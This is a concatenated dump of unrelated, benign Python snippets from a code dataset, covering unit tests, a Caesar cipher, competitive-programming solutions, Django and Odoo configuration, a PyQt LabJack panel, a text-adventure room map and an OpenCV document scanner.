        # imported at the top of the file (harmless here, but confusing).
        string = 'Case #'+str(k+1)+': '
        if res == -1:
            string = string + 'IMPOSSIBLE'
        else:
            string = string + str(res)
        print(string)
21,983 | 9a07510ff0baccc90ad3e2af58e7938564a13ec2 | import unittest
from count_letters import count_letters
class TestCountLetters(unittest.TestCase):
    """Unit tests for count_letters (maps each letter to its count)."""
    def test_count_empty_string(self):
        # An empty string produces an empty mapping.
        self.assertEqual(count_letters(""), {})
    def test_count_letters_single_string(self):
        self.assertEqual(count_letters("alma"), {'a': 2, 'l': 1, 'm': 1})
    def test_count_string_with_spaces(self):
        # Spaces are not counted as letters.
        self.assertEqual(count_letters("cats and cats"), {'c': 2, 'a': 3, 't': 2, "s": 2, "n": 1, "d": 1})
if __name__ == '__main__':
    unittest.main()
|
21,984 | 1594e9bf9dc3fea3b343ee13a57e9754dc793dab | import requests
def url_ok(url):
    """Return True when an HTTP HEAD request to *url* answers 200 OK."""
    return requests.head(url).status_code == 200
# Quick manual check against a known site.
url ="https://www.thinklabs.com/"
print(url_ok(url))
|
21,985 | f74abfd2bc9a19cddd9538ca20cf772de725cb6b | # -*- coding: utf-8 -*-
"""
Functions for parsing MatlabLexer output.
:copyright: Copyright 2023 Jørgen Cederberg
:license: BSD, see LICENSE for details.
"""
import re
import sphinx.util
logger = sphinx.util.logging.getLogger("matlab-domain")
def remove_comment_header(code):
    """
    Removes the comment header (if there is one) and empty lines from the
    top of the current read code.

    :param code: Current code string.
    :type code: str
    :returns: Code string without comments above a function, class or
              procedure/script.
    """
    # Count leading lines that are blank or MATLAB comments ('%').
    skipped = 0
    for line in code.splitlines(True):
        if not re.match(r"[ \t]*(%|\n)", line):
            break
        skipped += 1
    if skipped == 0:
        return code
    try:
        # Drop the header lines in one split.
        return code.split("\n", skipped)[skipped:][0]
    except IndexError:
        # The source consists solely of the header and blank lines.
        return ""
def remove_line_continuations(code):
    """
    Removes line continuations (...) from code as functions must be on a
    single line.

    :param code: Source code string.
    :type code: str
    :return: Code with '...' continuations (and their newlines) removed.
    """
    # Group 1 is the code before the dots; it must not contain a comment
    # marker or a string quote, so continuations inside those are kept.
    continuation = re.compile(r"^([^%'\"\n]*)(\.\.\..*\n)", re.MULTILINE)
    return continuation.sub(r"\g<1>", code)
def fix_function_signatures(code):
    """
    Transforms function signatures with line continuations to a function
    on a single line with () appended. Required because pygments cannot
    handle this situation correctly.

    :param code: Source code string.
    :type code: str
    :return: Code string with functions on single line
    """
    # Verbose (re.X) pattern; the character class [ \t.\n] also swallows
    # the '...' continuation dots between signature tokens.
    pat = r"""^[ \t]*function[ \t.\n]* # keyword (function)
        (\[?[\w, \t.\n]*\]?) # outputs: group(1)
        [ \t.\n]*=[ \t.\n]* # punctuation (eq)
        (\w+)[ \t.\n]* # name: group(2)
        \(?([\w, \t.\n]*)\)?""" # args: group(3)
    pat = re.compile(pat, re.X | re.MULTILINE) # search start of every line
    # replacement function
    def repl(m):
        retv = m.group(0)
        # if no args and doesn't end with parentheses, append "()"
        if not (m.group(3) or m.group(0).endswith("()")):
            retv = retv.replace(m.group(2), m.group(2) + "()")
        return retv
    code = pat.sub(repl, code) # search for functions and apply replacement
    return code
21,986 | 34d6f7fe545c9c636ce3bc7e8df4e157acf39bc8 | if __name__ == '__main__':
import argparse
from paqc.driver import driver
# define command line parser
parser = argparse.ArgumentParser(prog='paqc', description='Data QC package '
'of the Predictive Analytics team.')
# add arguments
parser.add_argument('config_path', type=str, action='store',
help="Path to config YAML file.")
parser.add_argument('--debug', action='store_true', help="Useful for devs.")
parser.add_argument('--silent', action='store_false',
help="Controls verbosity. Use it if you want paqc to"
"run with less messages.")
# parse input parameters
args = parser.parse_args()
# execute PAQC pipeline
d = driver.Driver(args.config_path, verbose=args.silent, debug=args.debug)
d.run()
|
21,987 | 40c87e5f8bfe533dec5569f25e6d3f369beb10b8 | from project.tools.connect_db import *
def main():
    """Open the local SQLite database and run select_cidade for the given city."""
    database_path = "D:\\sqlite\db\pythonsqlite.db"
    connection = create_connection(database_path)
    select_cidade(connection, "Serra Negra do Norte - RN")
if __name__ == '__main__':
main() |
21,988 | 34f37bf7c67c845b383d64d9fe679afa17783b5e | import json
# Python 2 script: dump tweet text from a file of line-delimited JSON
# (one tweet object per line), preferring the extended (untruncated) text
# when present.
# NOTE(review): `dict.has_key` and print statements are Python 2 only;
# porting to Python 3 needs `'extended_tweet' in tweets` and print().
# The file handle is never closed — consider `with open(...)`.
f = open('28_2018_jad_data.json', 'r')
for line in f:
    # Each line is a standalone JSON document.
    tweets= json.loads(line)
    if tweets.has_key('extended_tweet'):
        print "TEXT"
        print tweets['text']
        print '\r'
        print "EXTENDED"
        print tweets['extended_tweet']['full_text']
        print '\n'
    else:
        print "ONLY SHORT TEXT"
        print tweets['text']
        print '\n'
|
21,989 | 578f9bef150a7052d2557486c5a0e100eefa8db6 | import re
def encryption(S, n):
    """Caesar-shift every letter of *S* forward by *n* positions.

    Spaces pass through unchanged and the shift amount is appended to the
    end of the result so that decryption can recover it.  Characters
    outside a-z / space raise ValueError (via str.index).
    """
    alphabet = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'
    shifted = []
    for ch in S:
        if ch == ' ':
            shifted.append(' ')
        else:
            # index() returns the first occurrence (0..25); the modulo keeps
            # the shifted position inside a single alphabet.
            shifted.append(alphabet[(alphabet.index(ch) + n) % 26])
    return ''.join(shifted) + str(n)
def decryption(W):
    """Reverse encryption().

    The shift amount is read back from the first digit run embedded in
    *W*; all digits are then discarded and every letter is shifted back
    by that amount (spaces pass through unchanged).
    """
    alpha = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'
    # The first (and, for encryption() output, only) digit run is the key.
    shift = int(re.findall(r"\d+", W)[0])
    letters_only = ''.join(ch for ch in W if not ch.isdigit())
    plain = []
    for ch in letters_only:
        if ch == ' ':
            plain.append(' ')
        else:
            plain.append(alpha[(alpha.index(ch) - shift) % 26])
    return ''.join(plain)
def main():
    """Prompt for a message and a shift, then round-trip it through the cipher."""
    S = input("Please enter a string: ")
    S = S.lower()
    n = int(input("Please enter an integer: "))
    # FIX: encrypt once and reuse the result instead of calling
    # encryption(S, n) twice (identical output, half the work).
    W = encryption(S, n)
    print(W)
    print(decryption(W))
main() |
21,990 | bb3e546ff527d7c3d5b16b0078f60bfd52f67c50 | # https://atcoder.jp/contests/joi2015yo/submissions/16057780
# D - シルクロード (Silk Road)
import sys
sys.setrecursionlimit(10 ** 7)
input = sys.stdin.readline
f_inf = float('inf')
mod = 10 ** 9 + 7
def resolve():
    """JOI 2015 qual D "Silk Road": minimum total fatigue to cross n cities
    within m days.

    dp[i][j] = minimum fatigue after day i having completed j moves; each
    day you either rest or move one city, paying C[day] * D[city].
    Reads from stdin: "n m", then n distances D, then m weather costs C.
    """
    n, m = map(int, input().split())
    D = list(int(input()) for _ in range(n))
    C = list(int(input()) for _ in range(m))
    # dp over (day, cities crossed); f_inf marks unreachable states.
    dp = [[f_inf] * (n + 1) for _ in range(m + 1)]
    dp[0][0] = 0
    for i in range(1, m + 1):
        c = C[i - 1]
        for j in range(n):
            d = D[j]
            # Case: rest on day i (stay after j moves).
            dp[i][j] = min(dp[i][j], dp[i - 1][j])
            # Case: move on day i (complete move j + 1 at cost c * d).
            dp[i][j + 1] = min(dp[i][j + 1], dp[i - 1][j] + c * d)
    # Answer: best value over all days with all n moves completed.
    res = f_inf
    for i in range(m + 1):
        res = min(res, dp[i][-1])
    print(res)
if __name__ == '__main__':
    resolve()
|
21,991 | a1333e83bed34022942bd1a35e92884ced968386 | from django.contrib import admin
from django.urls import include, path
from django.conf import settings
from django.conf.urls.static import static
from . import views
from myapp.views import newcarpage
# URL routes for the car-sales site; media files are served via static()
# at the end of this list.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.index, name = 'myapp_index'),
    path('base/', views.base, name = 'myapp_base'),
    path('login/', views.user_login, name = 'myapp_user_login'),
    path('signup/', views.user_signup, name = 'myapp_user_signup'),
    path('logout/', views.user_logout, name = 'myapp_user_logout'),
    path('listing/', views.listing, name = 'myapp_listing'),
    path('delete/<int:id>/', views.deletelisting, name = 'deletelist'),
    path('appointment/', views.appointment, name = 'myapp_appointment'),
    path('addappointment/', views.addappointment, name = 'myapp_addappointment'),
    #this is car products urls
    path('newcarpage/', views.newcarpage, name = 'myapp_newcarpage'),
    path('upcomingcar/', views.upcomingcarpage, name = 'myapp_upcomingcarpage'),
    path('listingcarpage/', views.listingcarpage, name = 'myapp_listingcarpage'),
    path('usedcarpage/', views.usedcarpage, name = 'myapp_usedcarpage'),
    #this is car detail urls
    # NOTE(review): the four detail routes below all share the name
    # 'myapp_newcardetailpage'; reverse()/{% url %} will only resolve the
    # last one registered. They likely need distinct names — confirm
    # against the templates before renaming.
    path('newcardetail/<int:id>', views.newcardetailpage, name = 'myapp_newcardetailpage'),
    path('upcomingcardetail/<int:id>', views.upcomingcardetailpage, name = 'myapp_newcardetailpage'),
    path('usedcardetail/<int:id>', views.usedcardetailpage, name = 'myapp_newcardetailpage'),
    path('listingcardetail/<int:id>', views.listingcardetailpage, name = 'myapp_newcardetailpage'),
    #additional pages
    path('aboutus/', views.aboutus, name = 'aboutus'),
    path('team/', views.ourteam, name = 'team'),
    path('test/', views.testing, name = 'testing'),
    path('search/', views.searchfunc, name = 'searchfunc'),
    path('contactus/', views.contactuss, name = 'contactus'),
    path('testimonials/', views.testimonial, name = 'testimonial'),
    path('sellcar/', views.sellcar, name = 'sellcar'),
    path('buycar/', views.buycar, name = 'buycar'),
    path('predict/', views.predictprice, name = 'predictprice'),
    path('newsletter/', views.newsletter, name = 'newsletter'),
    path('addtestemonial/', views.addtestemonial, name = 'addtestemonial'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) |
21,992 | a575961671d068a34ba92f73b27202660e47466d |
from PyQt5 import QtCore
from PyQt5.QtCore import Qt
from PyQt5 import QtGui
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QWidget
from PyQt5 import uic
from LabJackPython import deviceCount, listAll
from labjack import MyU3
Form, Base = uic.loadUiType('connect.ui')
class ConnectPanel(Base, Form):
    """Qt panel (loaded from connect.ui) for discovering and opening
    LabJack U3 devices, mirroring the selected device's configuration in
    a two-column property table.

    Signals:
        deviceOpened(MyU3): emitted after a device has been opened.
        deviceDisconnected(): emitted when all devices are closed.
    """
    # Names of widgets from the .ui file that are re-bound as attributes.
    childNames = ['deviceComboBox', 'propertyViewer']
    # Device type code passed to listAll(); presumably the U3 product
    # id — TODO confirm against LabJackPython.
    deviceType = 3
    deviceOpened = QtCore.pyqtSignal(MyU3)
    deviceDisconnected = QtCore.pyqtSignal()
    def __init__(self, *args, **kwargs):
        """Build the UI, populate the device list and set up the table."""
        super().__init__(*args, **kwargs)
        # self.groupButtons()
        self.setupUi(self)
        self.gatherChildren()
        self.setupComboBox()
        self.propertyViewer.setColumnCount(2)
        self.propertyViewer.setHorizontalHeaderItem(0, QtWidgets.QTableWidgetItem('Property'))
        self.propertyViewer.setHorizontalHeaderItem(1, QtWidgets.QTableWidgetItem('Value'))
        self.propertyViewer.horizontalHeader().setStretchLastSection(True)
        self.connectButtons()
    def gatherChildren(self):
        """Expose each named .ui child widget as an attribute of self."""
        for name in self.childNames:
            child = self.findChild(QtCore.QObject, name)
            if child is not None:
                setattr(self, name, child)
            else:
                print("Child '{}' not found!".format(name))
    def setupComboBox(self):
        """Seed the combo box with its static entries.

        Fixed layout: 0 = placeholder, 1 = separator, 2 = 'Refresh list',
        3 = separator; device entries start at index 4 (see
        comboBoxCallback).
        """
        self.deviceComboBox.addItem('Select a device...')
        self.deviceComboBox.insertSeparator(1)
        self.deviceComboBox.addItem('Refresh list')
        self.deviceComboBox.insertSeparator(3)
        self.deviceComboBox.currentIndexChanged.connect(self.comboBoxCallback)
        # Trigger an initial refresh as if 'Refresh list' were chosen.
        self.comboBoxCallback(2)
    def comboBoxCallback(self, newIndex):
        """Dispatch on the combo box layout described in setupComboBox."""
        if newIndex == 0:
            pass
        elif newIndex == 2:
            self.refreshDeviceList()
            self.deviceComboBox.setCurrentIndex(0)
        elif newIndex >= 4:
            # Entries past the second separator map 1:1 onto deviceList.
            self.selectDevice(newIndex - 4)
    def clearDevices(self):
        """Close every open device and drop all device entries from the UI."""
        self.propertyViewer.clearContents()
        self.propertyViewer.setRowCount(0)
        MyU3.close_all()
        self.deviceDisconnected.emit()
        # Remove device entries (index 4 and up), iterating backwards.
        # NOTE(review): the range starts at count(), one past the last valid
        # index; that first removeItem call targets a non-existent row —
        # confirm Qt silently ignores it (it appears to in practice).
        for i in range(self.deviceComboBox.count(), 3, -1):
            self.deviceComboBox.removeItem(i)
    def refreshDeviceList(self):
        """Re-enumerate attached devices and repopulate the combo box."""
        self.clearDevices()
        devices = listAll(self.deviceType)
        self.deviceList = []
        for key in devices.keys():
            self.deviceComboBox.addItem(devices[key]['deviceName'])
            self.deviceList.append(devices[key])
    def selectDevice(self, index):
        """Open the device at *index* in deviceList by its serial number."""
        dev = self.deviceList[index]
        sn = dev['serialNumber']
        self.myu3instance = MyU3(False, sn)
        self.displayProperties()
    def displayProperties(self):
        """Show the opened device's configuration and announce it."""
        self.updatePropertyViewer()
        self.deviceOpened.emit(self.myu3instance)
    def updatePropertyViewer(self):
        """Fill the property table from the device's U3 and IO config."""
        prop = self.myu3instance.configU3()
        ioprops = self.myu3instance.configIO()
        prop['FIOAnalog'] = ioprops['FIOAnalog']
        prop['EIOAnalog'] = ioprops['EIOAnalog']
        self.propertyViewer.setRowCount(len(prop))
        for i, (key, val) in enumerate(prop.items()):
            self.propertyViewer.setItem(i, 0, QtWidgets.QTableWidgetItem(key))
            self.propertyViewer.setItem(i, 1, QtWidgets.QTableWidgetItem(str(val)))
    def groupButtons(self, buttons, tag):
        """Collect *buttons* into an exclusive QButtonGroup stored under *tag*.

        NOTE(review): currently unused — the only call site (in __init__) is
        commented out and passes no arguments; confirm intent before wiring.
        """
        if not hasattr(self, 'buttonGroups'):
            self.buttonGroups = {}
        group = QtWidgets.QButtonGroup()
        for i, b in enumerate(buttons):
            b.setCheckable(True)
            b.setChecked(i == 0)
            group.addButton(b)
            group.setId(b, i)
            group.setExclusive(True)
        self.buttonGroups[tag] = group
    def connectButtons(self):
        """Placeholder for wiring button signals; intentionally empty."""
        pass
if __name__ == '__main__':
    # Manual smoke test: show the panel standalone inside a Qt event loop.
    app = QtWidgets.QApplication([])
    panel = ConnectPanel()
    panel.show()
    app.exec_()
|
21,993 | ac33c8c98031f731820f10e408bfc074796852f3 | # Implement a class to hold room information. This should have name and
# description attributes.
# making a change for initial push
from termcolor import colored
class Room:
    """A single location in the adventure map.

    Exits are represented by attributes (``n_to``/``s_to``/``e_to``/``w_to``)
    attached to instances after construction (see the linking code below).
    """

    # Compass attribute -> display name, in the order exits are reported.
    _EXITS = (('n_to', 'North'), ('s_to', 'South'),
              ('e_to', 'East'), ('w_to', 'West'))

    def __init__(self, name, description, is_lit=True):
        self.name = name
        self.description = description
        self.list = []  # items lying in the room
        self.is_lit = is_lit

    def _exit_sentence(self, directions):
        """Build the exit message for a list of direction names.

        Replaces the previous four near-identical branches with one
        table-driven builder; the output strings are unchanged.
        """
        if not directions:
            return ' You see no exit to this room!\n'
        if len(directions) == 1:
            return ' You see an exit to the {}\n'.format(directions[0])
        if len(directions) == 2:
            return ' You see exits to the {} and {}\n'.format(*directions)
        if len(directions) == 3:
            return ' You see exits to the {}, {}, and {}\n'.format(*directions)
        return ' You see exits in all directions.\n'

    def show_exits(self):
        """Print a bold green sentence describing this room's exits."""
        directions = [label for attr, label in self._EXITS if hasattr(self, attr)]
        print(colored(self._exit_sentence(directions), 'green', attrs=['bold']))
# Declare all the rooms
room = {
'outside': Room("Outside Cave Entrance",
"North of you, the cave mouth beckons"),
'foyer': Room("Foyer", """Dim light filters in from the south. Dusty
passages run north and east."""),
'overlook': Room("Grand Overlook", """A steep cliff appears before you, falling
into the darkness. Ahead to the north, a light
flickers in the distance, but there is no way
across the chasm."""),
'narrow': Room("Narrow Passage", """The narrow passage bends here from west
to north. The smell of gold permeates the air.""", is_lit=False),
'treasure': Room("Treasure Chamber", """You've found the long-lost treasure
chamber! Sadly, it has already been completely
emptied by earlier adventurers. The only exit
is to the south.""", is_lit=False),
'traproom': Room("Trap Room", """The door slams behind you and you hear
the lock click as it shuts. You see a shrine
to the great goddess of the willows. Maybe you
should leave an offering...""", is_lit=False),
}
# Link rooms together: (source room, direction attribute, destination room).
# Note: traproom deliberately gets no exits, and narrow's south exit leads
# into it.
_connections = (
    ('outside', 'n_to', 'foyer'),
    ('foyer', 's_to', 'outside'),
    ('foyer', 'n_to', 'overlook'),
    ('foyer', 'e_to', 'narrow'),
    ('overlook', 's_to', 'foyer'),
    ('narrow', 'w_to', 'foyer'),
    ('narrow', 'n_to', 'treasure'),
    ('treasure', 's_to', 'narrow'),
    ('narrow', 's_to', 'traproom'),
)
for _src, _direction, _dest in _connections:
    setattr(room[_src], _direction, room[_dest])
|
21,994 | 46226ccd553a7e390a4242bc3249ebf3ff0c27f7 | from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score
def training_classificator(dataset):
    """Fit a decision tree on the iris data and print train/test accuracy.

    :param dataset: mapping with 'data' (feature matrix) and 'target'
        (class labels: 0 = Setosa, 1 = Versicolurs, 2 = Virginica).
    """
    features = dataset['data']
    labels = dataset['target']
    # NOTE: train_test_split is not seeded, so the reported accuracies
    # vary from run to run.
    X_train, X_test, y_train, y_test = train_test_split(features, labels)
    model = DecisionTreeClassifier()
    model.fit(X_train, y_train)
    # Score on the fitted data and on the held-out split.
    accuracy_train = accuracy_score(y_train, model.predict(X_train))
    accuracy_test = accuracy_score(y_test, model.predict(X_test))
    print(f"Train: {accuracy_train} \nTest: {accuracy_test}")
if __name__ == '__main__':
dataset = load_iris()
training_classificator(dataset) |
21,995 | b3c7c58f1361753f379412c8f7884954e2e54048 | from Wallet import app
from dashboard import Dashboard
from expense import Expense
from income import Income
from reward import Reward
from savings import Savings
def register_views():
    """Register every view class on the shared Wallet application object."""
    for view_class in (Dashboard, Expense, Income, Reward, Savings):
        view_class.register(app)
|
21,996 | dcceb0f39095f0b47464d392172950d1455741a4 | #
# @lc app=leetcode id=2042 lang=python3
#
# [2042] Check if Numbers Are Ascending in a Sentence
#
# @lc code=start
class Solution:
    def areNumbersAscending(self, s: str) -> bool:
        """Return True when every number token in *s* is strictly greater
        than the number token before it (non-number tokens are ignored)."""
        last_value = -1
        for token in s.split(' '):
            if not token.isnumeric():
                continue
            value = int(token)
            if value <= last_value:
                return False
            last_value = value
        return True
# @lc code=end
|
21,997 | 754b581bf1bc82671714a32dd931c0fcc12b4b88 | # -*- coding: utf-8 -*-
from openerp import models, fields
class ResourceCalendar(models.Model):
    """ Extend resource.calendar to support Estate Business Process
    """
    _inherit = 'resource.calendar'
    # A calendar may carry several attendance conditions; see the
    # hr_indonesia.calendar_condition model defined below in this file.
    condition_ids = fields.One2many('hr_indonesia.calendar_condition', 'resource_calendar_id', 'Calendar Condition')
class Condition(models.Model):
    """
    Support mandatory early in and late out
    """
    _name = 'hr_indonesia.calendar_condition'
    _description = 'HR Indonesia Calendar Condition'
    resource_calendar_id = fields.Many2one('resource.calendar', 'Resource Calendar')
    name = fields.Char('Condition')
    # BUG FIX: the two implicitly concatenated help fragments had no
    # separator and rendered as "...early-in* positive..."; join them with
    # a newline so each bullet shows on its own line.
    time = fields.Float('Time', help='* negative value, early-in\n'
                                     '* positive value, late-out.')
    # NOTE(review): the 'out' label reads "Mandatory Early Out" although the
    # class docstring says "late out" — confirm the intended wording.
    type = fields.Selection([('in', 'Mandatory Early In'),
                             ('out', 'Mandatory Early Out'),
                             ('optional', 'Optional In/Out')],
                            'Condition Type')
21,998 | c445780d852913024ef26f9669c886e1176574c5 | import numpy as np
# For an H x W grid of '.' and '#', find the maximum number of cells lit
# by a light placed on a '.', counting its full horizontal and vertical
# runs (the light's own cell only once).
H,W = map(int, input().split())
S = [list(input()) for _ in range(H)]
# w_point[h][w]: length of the maximal horizontal '.'-run containing (h, w).
# BUG FIX: both grids must have H rows (was `for j in range(W)`), which
# raised IndexError whenever H > W.
w_point = [[0 for i in range(W)] for j in range(H)]
for h in range(H):
    bw = 0
    for w in range(W):
        if S[h][w] == '#':
            for i in range(bw,w):
                w_point[h][i] = w - bw
            bw = w + 1
        if w == W -1:
            for i in range(bw, w+1):
                w_point[h][i] = w+1 - bw
# h_point[h][w]: length of the maximal vertical '.'-run containing (h, w).
h_point = [[0 for i in range(W)] for j in range(H)]
for w in range(W):
    bh = 0
    for h in range(H):
        if S[h][w] == '#':
            for i in range(bh,h):
                h_point[i][w] = h - bh
            bh = h + 1
        if h == H - 1:
            for i in range(bh, h+1):
                h_point[i][w] = h+1 - bh
# Best horizontal + vertical run through one cell, counting it once.
print(np.max(np.array(w_point)+np.array(h_point)-1))
21,999 | ac82111aae50159fa24cbd92e847d7db3e06d748 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 8 23:40:41 2020
@author: harshvardhan
"""
def CannyE(grayImageBlur):
    """Return the Canny edge map of a blurred grayscale image.

    Uses thresholds 100/300 with aperture size 3.  Relies on the
    module-level ``import cv2`` that appears further down in this file
    (resolved at call time, after the import has run).
    """
    return cv2.Canny(grayImageBlur, 100, 300, 3)
def SobelE(img):
    """Return a normalized Sobel edge-magnitude image.

    :param img: 2-D (grayscale) numpy array — in this script, the blurred
        grayscale frame.
    :return: float array of the same shape, scaled so its maximum is 1.0
        (border cells keep their original, rescaled pixel values).
    """
    # 3x3 Sobel kernels for vertical and horizontal gradients.
    vertical_filter = [[-1,-2,-1], [0,0,0], [1,2,1]]
    horizontal_filter = [[-1,0,1], [-2,0,2], [-1,0,1]]
    n,m = img.shape
    # Work in float so integer inputs don't truncate the edge scores.
    edges_img = img.copy().astype(float)
    for row in range(3, n-2):
        for col in range(3, m-2):
            local_pixels = img[row-1:row+2, col-1:col+2]
            vertical_score = (vertical_filter*local_pixels).sum()/4
            horizontal_score = (horizontal_filter*local_pixels).sum()/4
            edge_score = (vertical_score**2 + horizontal_score**2)**.5
            # BUG FIX: the original assigned [edge_score]*3 (a 3-element
            # list) into a single cell, which raises ValueError on the 2-D
            # grayscale input this function receives.
            edges_img[row, col] = edge_score
    edges_img = edges_img/edges_img.max()
    return edges_img
import numpy as np
import cv2
import imutils
# Document-scanner pipeline: read an image, detect edges, find the page
# contour, warp it to a top-down view, and threshold into a B&W scan.
img = cv2.imread("test.jpg")
orig = img.copy()
if img.shape[0]>1500 and img.shape[1]>1200:
    #Rescaling the image
    scale_percent = 20# percent of original size
    width = int(img.shape[1] * scale_percent / 100)
    height = int(img.shape[0] * scale_percent / 100)
    dim = (width, height)
    # resize image
    img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)
grayImage = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
grayImageBlur = cv2.blur(grayImage,(3,3))
print("Which Edge Detection Technique :")
print("1 - Canny :")
print("2 - Sobel :")
n = int(input())
if n==1:
    edgedImage = CannyE(grayImageBlur)
if n==2:
    edgedImage = SobelE(grayImageBlur)
# NOTE(review): any other choice leaves edgedImage undefined and the code
# below raises NameError.  Also, SobelE returns a float image while
# cv2.findContours expects an 8-bit single-channel image, so the Sobel
# path likely needs a conversion — confirm.
st = str(n)+"img.jpg"
cv2.imshow("Edge Detected Image", edgedImage)
cv2.imwrite(st, edgedImage)
cv2.waitKey(0) # press 0 to close all cv2 windows
cv2.destroyAllWindows()
# find the contours in the edged image, sort area wise
# keeping only the largest ones
allContours = cv2.findContours(edgedImage.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
allContours = imutils.grab_contours(allContours)
# descending sort contours area and keep top 1
allContours = sorted(allContours, key=cv2.contourArea, reverse=True)[:1]
# approximate the contour
perimeter = cv2.arcLength(allContours[0], True)
ROIdimensions = cv2.approxPolyDP(allContours[0], 0.02*perimeter, True)
# show the contour on image
cv2.drawContours(img, [ROIdimensions], -1, (0,255,0), 2)
cv2.imshow("Contour Outline", img)
cv2.waitKey(0)
cv2.destroyAllWindows()
# reshape coordinates array
# NOTE(review): assumes the approximated contour has exactly 4 points; a
# non-quadrilateral approximation makes this reshape fail.
ROIdimensions = ROIdimensions.reshape(4,2)
# list to hold ROI coordinates
rect = np.zeros((4,2), dtype="float32")
# top left corner will have the smallest sum,
# bottom right corner will have the largest sum
s = np.sum(ROIdimensions, axis=1)
rect[0] = ROIdimensions[np.argmin(s)]
rect[2] = ROIdimensions[np.argmax(s)]
# top-right will have smallest difference
# botton left will have largest difference
diff = np.diff(ROIdimensions, axis=1)
rect[1] = ROIdimensions[np.argmin(diff)]
rect[3] = ROIdimensions[np.argmax(diff)]
# top-left, top-right, bottom-right, bottom-left
(tl, tr, br, bl) = rect
# compute width of ROI
widthA = np.sqrt((tl[0] - tr[0])**2 + (tl[1] - tr[1])**2 )
widthB = np.sqrt((bl[0] - br[0])**2 + (bl[1] - br[1])**2 )
maxWidth = max(int(widthA), int(widthB))
# compute height of ROI
heightA = np.sqrt((tl[0] - bl[0])**2 + (tl[1] - bl[1])**2 )
heightB = np.sqrt((tr[0] - br[0])**2 + (tr[1] - br[1])**2 )
maxHeight = max(int(heightA), int(heightB))
# Set of destinations points for "birds eye view"
# dimension of the new image
dst = np.array([
    [0,0],
    [maxWidth-1, 0],
    [maxWidth-1, maxHeight-1],
    [0, maxHeight-1]], dtype="float32")
# compute the perspective transform matrix and then apply it
transformMatrix = cv2.getPerspectiveTransform(rect, dst)
# transform ROI
# NOTE(review): the warp samples from `orig` (full resolution) using corner
# coordinates measured on the possibly downscaled `img` — confirm the
# intended scale when the rescaling branch above runs.
scan = cv2.warpPerspective(orig, transformMatrix, (maxWidth, maxHeight))
# lets see the wraped document
cv2.imshow("Scaned",scan)
cv2.waitKey(0)
cv2.destroyAllWindows()
# convert to gray
scanGray = cv2.cvtColor(scan, cv2.COLOR_BGR2GRAY)
# display final gray image
cv2.imshow("scanGray", scanGray)
cv2.waitKey(0)
cv2.destroyAllWindows()
from skimage.filters import threshold_local
# increase contrast incase its document
T = threshold_local(scanGray, 9, offset=8, method="gaussian")
scanBW = (scanGray > T).astype("uint8") * 255
# display final high-contrast image
cv2.imshow("scanBW", scanBW)
cv2.waitKey(0)
cv2.destroyAllWindows() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.